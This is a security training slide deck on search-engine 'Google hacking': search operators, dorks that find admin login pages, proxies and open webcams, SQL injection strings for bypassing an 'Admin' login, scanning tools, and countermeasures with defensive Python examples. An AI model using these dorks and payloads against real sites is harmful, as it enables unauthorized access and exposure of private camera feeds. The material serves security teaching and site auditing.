Google and Beyond:
Advanced Search Engine Hacking
and Web-Based Intelligence
Gathering
By
Manish Kumar
Founder & CEO,
Rooman Technologies Pvt Ltd
AGENDA
• How Google works
• Information disclosure with Google
• Tools
• Countermeasures
Google Hacking
Web Hacking:
Pick a site, find the vulnerability
Google Hacking:
Pick a vulnerability, find the site.
Don’t Be A Target of Opportunity
How Google Works
• Googlebot,
– a web crawler that finds and
fetches web pages.
• The indexer
– that sorts every word on
every page and stores the
resulting index of words in a
huge database.
• The query processor
– which compares your search
query to the index and
recommends the documents
that it considers most
relevant.
How Google Works
[Diagram: server side and client side]
How Googlebot Works
Googlebot finds pages in
two ways
– through an add URL
form,
www.google.com/addurl.html
– through finding links by
crawling the web.
Indexer and Query Processor
• Indexer
– Googlebot gives the
indexer the full text of
the pages it finds. These
pages are stored in
Google’s index database
in alphabetic order.
– Each index entry stores a
list of documents in
which the term appears
and the location within
the text where it occurs.
• Query Processor
– PageRank places more
important pages higher in
the results.
– Intelligent Technique for
learning relationships
and associations within
the stored data
– Spelling Correcting
System
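The index entries described above (each term mapped to the documents that contain it and the positions where it occurs) can be sketched as a small inverted index. This is a minimal illustration, not Google's implementation; the names build_index and search and the sample pages are assumptions made for the example.

```python
from collections import defaultdict

def build_index(pages):
    """Map each lowercased word to {page_id: [word positions]}."""
    index = defaultdict(dict)
    for page_id, text in pages.items():
        for position, word in enumerate(text.lower().split()):
            index[word].setdefault(page_id, []).append(position)
    return index

def search(index, query):
    """Return the ids of pages that contain every word of the query."""
    words = query.lower().split()
    if not words:
        return set()
    matches = [set(index.get(word, {})) for word in words]
    return set.intersection(*matches)

# Hypothetical sample pages, used only for illustration.
pages = {
    "a.html": "auto insurance quote",
    "b.html": "home insurance",
}
index = build_index(pages)
print(sorted(index["insurance"].items()))
print(search(index, "insurance quote"))
```

Storing positions as well as page ids is what lets a query processor later test for exact phrases and adjacency.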
So What Determines Page
Relevance and Rating?
• Exact Phrase:
– are your keywords found as an exact phrase in any
pages?
• Adjacency:
– how close are your keywords to each other?
• Weighting:
– how many times do the keywords appear in the page?
• PageRank/Links:
– How many links point to the page? How many links are
actually in the page?
Equation: (Exact Phrase Hit)+(AdjacencyFactor)+(Weight) * (PageRank/Links)
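The equation above can be tried out with a few numbers. The sketch below assumes the three additive factors are grouped before being multiplied by PageRank/Links; the slide does not state the grouping, and the function name and sample values are hypothetical. It illustrates the slide's heuristic only, not Google's actual ranking.

```python
def relevance_score(exact_phrase_hit, adjacency_factor, weight, pagerank, links):
    """Combine the slide's factors; the grouping of terms is an assumption."""
    if links <= 0:
        raise ValueError("links must be positive")
    return (exact_phrase_hit + adjacency_factor + weight) * (pagerank / links)

# Hypothetical sample values chosen only to show the arithmetic.
score = relevance_score(
    exact_phrase_hit=1, adjacency_factor=0.5, weight=3, pagerank=6, links=3
)
print(score)  # (1 + 0.5 + 3) * (6 / 3) = 9.0
```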
The Basics
• To set the stage for what I will demo, it is
necessary to understand some of Google’s
advanced search functions.
• This will not be an exhaustive list, just an intro.
• Creative use of these functions is the key to
successful Google Hacking.
The Basics
• Some important things to keep in mind
– Google queries are not case sensitive.
– The * wildcard represents any word
• Example: “* insurance quote”
– Google stems words automatically
• Example: “automobile insurance quote” brings up sites
with “auto … “.
The Basics
• The + symbol forces inclusion of a certain
word.
– “auto insurance +progressive”
• The - symbol forces exclusion of a certain
word.
– (site:progressive.com -site:www.progressive.com)
• The | symbol provides boolean OR logic.
– “auto insurance + inurl:(progressive | geico)”
Information Disclosure with Google
• Advanced Search Operators
– site: (.edu, .gov, foundstone.com, usc.edu)
– filetype: (txt, xls, mdb, pdf, .log)
– Daterange: (julian date format)
– Intitle / allintitle
– Inurl / allinurl
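The daterange: operator above expects Julian dates rather than calendar dates. A minimal sketch of the conversion follows, assuming the operator takes whole Julian day numbers in the form start-end; the helper names are hypothetical.

```python
from datetime import date

def julian_day(d):
    """Julian day number for a Gregorian calendar date."""
    # date.toordinal() counts days starting at 1 for 0001-01-01;
    # adding 1721425 shifts that count to the Julian day number.
    return d.toordinal() + 1721425

def daterange_term(start, end):
    """Format a daterange: search term for the given calendar dates."""
    return f"daterange:{julian_day(start)}-{julian_day(end)}"

print(daterange_term(date(2000, 1, 1), date(2000, 1, 31)))
# prints: daterange:2451545-2451575
```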
Advanced Operators
• link:URL = lists other pages that link to the URL.
• related:URL = lists other pages that are related to the URL.
• site:domain.com “search term” = restricts search results to
the given domain.
• allinurl:WORDS = shows only pages with all search terms in the url.
• inurl:WORD = like allinurl: but filters the URL based on the first
term only.
• allintitle:WORD = shows only results with terms in title.
• intitle:WORD = similar to allintitle, but only for the next word.
• cache:URL = will show the Google cached version of the URL.
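When auditing your own domain, the operators above are usually combined into one query. The sketch below only builds the query string and a percent-encoded search URL; it sends nothing. The function names are hypothetical and example.com stands in for a domain you are authorized to assess.

```python
from urllib.parse import urlencode

def build_query(terms="", **operators):
    """Join free-text terms with operator:value pairs into one query string."""
    parts = [terms] if terms else []
    parts += [f"{name}:{value}" for name, value in operators.items()]
    return " ".join(parts)

def search_url(query):
    """Percent-encode the query into a search URL."""
    return "https://www.google.com/search?" + urlencode({"q": query})

# example.com is a placeholder for your own site.
query = build_query('"server at"', site="example.com", intitle="index.of")
print(query)
print(search_url(query))
```

Keeping the query builder separate from the URL encoding makes it easy to review the exact search text before anyone runs it.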
The Basics
• Let’s take a look at a few of the interesting
Google search commands.
The Basics
• There are many more advanced operators.
• Combining these creatively is the key to
Google Hacking.
• http://www.googleguide.com/advanced_operators_reference.html
BUT DO YOU REALLY NEED TO REMEMBER IT?
Advanced Search with Google
INTERESTING SEARCHES…
Now that we’ve gotten this boring
stuff out of the way, let’s introduce
some Google hacks.
Google and Proxy
• Use www.google.com/translate_t to bypass
Internet browser security settings.
• Find a proxy that works, and enter the URL
– inurl:"nph-proxy.cgi" "start using cgiproxy"
– inurl:"nph-proxy.cgi" "Start browsing through this
CGI-based proxy"
Gaining auth bypass on an admin
account
• There are a large number of Google dorks for
finding admin login pages to test for basic SQL injection
– "inurl:admin.asp"
– "inurl:login/admin.asp"
– "inurl:admin/login.asp"
– "inurl:adminlogin.asp"
– "inurl:adminhome.asp"
– "inurl:admin_login.asp"
– "inurl:administratorlogin.asp"
– "inurl:login/administrator.asp"
– "inurl:administrator_login.asp"
SQL Injection
Keep the username as "Admin" and for the password type one of
the following:
• ' or '1'='1
• ' or 'x'='x
• ' or 0=0 --
• " or 0=0 --
• or 0=0 --
• ' or 0=0 #
• " or 0=0 #
• or 0=0 #
• " or "x"="x
• ') or ('x'='x
• ' or 1=1--
• " or 1=1--
• or 1=1--
• ' or a=a--
• " or "a"="a
• ') or ('a'='a
• ") or ("a"="a
• hi" or "a"="a
• hi" or 1=1 --
• hi' or 1=1 --
• blah'
• 'or'1=1'
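Strings like these only work when a login form pastes user input directly into its SQL text. The sketch below, using Python's built-in sqlite3 module, shows one such string succeeding against a string-built query and failing against a parameterized one. The table layout, function names, and plaintext password are assumptions made for the demonstration only.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
# Plaintext password for demonstration only; real systems store salted hashes.
conn.execute("INSERT INTO users VALUES ('Admin', 's3cret')")

def login_vulnerable(username, password):
    # UNSAFE: user input is pasted into the SQL text, so quotes in the
    # input change the structure of the query.
    sql = (
        "SELECT COUNT(*) FROM users "
        "WHERE username = '%s' AND password = '%s'" % (username, password)
    )
    return conn.execute(sql).fetchone()[0] > 0

def login_safe(username, password):
    # Placeholders keep the input as data; it is never parsed as SQL.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0

payload = "' or '1'='1"
print(login_vulnerable("Admin", payload))  # True: the check is bypassed
print(login_safe("Admin", payload))        # False: treated as a wrong password
print(login_safe("Admin", "s3cret"))       # True: the real password still works
```

Parameterized queries are the fix on the application side: the same form stays usable while the injected quotes lose their meaning.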
Few more interesting Searches
• Browsing images of the site
– site:xxxxxxx in Google Images
• Browse Live Video Cameras
– inurl:"viewerframe?mode=motion"
(http://202.212.193.26:555/ViewerFrame?Mode=Motion&Language=0)
– intitle:"Live View / - AXIS"
• Browse Open Webcams Worldwide
– Axis Webcams: inurl:/view.shtml or inurl:view/index.shtml
– Canon Webcams: sample/LvAppl/
• Server versioning
– intitle:index.of "server at"
Tools
– Google Hacks
– Goolag Site Scanner
– Site Digger
– Gooscan
– Goolink Scanner
– Athena
GOOGLE HACKS
• Google Hacks is a compilation of carefully
crafted Google searches that expose novel
functionality from Google's search and map
services
• You can use it to view a timeline of your
search results, view a map, search for music,
search for books, and perform many other
specific kinds of searches
• You can also use this program to use Google as
a proxy
GOOGLE HACK SCREEN SHOT
GOOLAG SCANNER
• Goolag Scanner enables everyone to audit
his/her own web site via Google
• It uses one xml-based configuration file for its
settings
Screenshot of GOOLAG SCANNER
SITEDIGGER
• Automated Google hacking tool from
Foundstone
• Uses Google API
• Uses Google Hacking Database
• SiteDigger searches Google’s cache to look for
vulnerabilities, errors, configuration issues,
proprietary information, and interesting
security nuggets on websites
Screen shot of SITE DIGGER
Countermeasures
• Keep sensitive data off the web!
• Do not display detailed error messages
• Do not allow directory browsing
• Perform periodic Google assessments
• Update robots.txt (for examples and suggestions
for using a robots.txt file, see http://www.robotstxt.org)
• Use meta-tags: NOARCHIVE
• Remove pages that are already indexed: http://www.google.com/remove.html
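As part of a periodic assessment, the NOARCHIVE countermeasure can be verified automatically. The sketch below uses Python's standard html.parser to check whether a page carries a robots meta tag with the noarchive directive. The class and function names and the sample HTML are hypothetical.

```python
from html.parser import HTMLParser

class RobotsMetaParser(HTMLParser):
    """Collect the directives of every <meta name="robots"> tag."""

    def __init__(self):
        super().__init__()
        self.directives = set()

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        attributes = dict(attrs)
        if (attributes.get("name") or "").lower() != "robots":
            return
        content = attributes.get("content") or ""
        for part in content.split(","):
            if part.strip():
                self.directives.add(part.strip().lower())

def has_noarchive(html):
    """Return True if the page asks search engines not to cache it."""
    parser = RobotsMetaParser()
    parser.feed(html)
    return "noarchive" in parser.directives

# Hypothetical sample pages, used only for illustration.
protected = '<html><head><meta name="robots" content="NOARCHIVE, nofollow"></head></html>'
unprotected = "<html><head><title>Report</title></head></html>"
print(has_noarchive(protected))
print(has_noarchive(unprotected))
```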
This is bad!
How To Protect Your Websites From
Google Hackers
• Use a robots.txt file to prevent Google and
other search engines from crawling your site if
it shouldn’t be crawled.
ROBOTS.TXT Example
• This example allows all robots to visit all files because the
wildcard "*" specifies all robots:
– User-agent: *
– Disallow:
• This example keeps all robots out:
– User-agent: *
– Disallow: /
• The next is an example that tells all crawlers not to enter four
directories of a website:
– User-agent: *
– Disallow: /cgi-bin/
– Disallow: /images/
– Disallow: /tmp/
– Disallow: /private/
Robots.txt Cont..
• Example that tells a specific crawler not to enter one specific
directory:
– User-agent: BadBot # replace the 'BadBot' with the actual user-agent
of the bot
– Disallow: /private/
• Example that tells all crawlers not to enter one specific file:
– User-agent: *
– Disallow: /directory/file.html
• Note that all other files in the specified directory will be
processed.
• Example demonstrating how comments can be used:
– # Comments appear after the "#" symbol at the start of a line, or after
a directive
– User-agent: * # match all bots
– Disallow: / # keep them out
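Rules like these can be checked before deployment with Python's standard urllib.robotparser module. The sketch below loads the four-directory example and asks which paths a crawler may fetch. The bot name ExampleBot and the example.com URLs are placeholders.

```python
from urllib.robotparser import RobotFileParser

# The four-directory example, one directive per line.
rules = """\
User-agent: *
Disallow: /cgi-bin/
Disallow: /images/
Disallow: /tmp/
Disallow: /private/
"""

parser = RobotFileParser()
parser.parse(rules.splitlines())

# "ExampleBot" is a placeholder user-agent; it falls under the "*" rules.
for path in ("/index.html", "/private/report.html", "/tmp/cache.txt"):
    allowed = parser.can_fetch("ExampleBot", "http://www.example.com" + path)
    print(path, "allowed" if allowed else "blocked")
```

Only well-behaved crawlers honor robots.txt, so a check like this confirms what compliant search engines will skip, not what is actually protected.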
Few interesting Websites
• www.archive.org
– Archive of websites (Wayback Machine)
• www.readnotify.com
– Find out when your email gets read, Retract,
Certify, Track & much more
• www.guerrillamail.com
– Provides you with disposable e-mail addresses
which expire after 15 minutes.
• www.gorillaemail.com
– Email marketing solution that allows you to send, track
and confirm delivery of emails, newsletters, events etc.
QUESTIONS ????
THANK YOU
Manish Kumar,
CEO, Rooman Technologies
Email: [email protected]
Ph: 080-40445566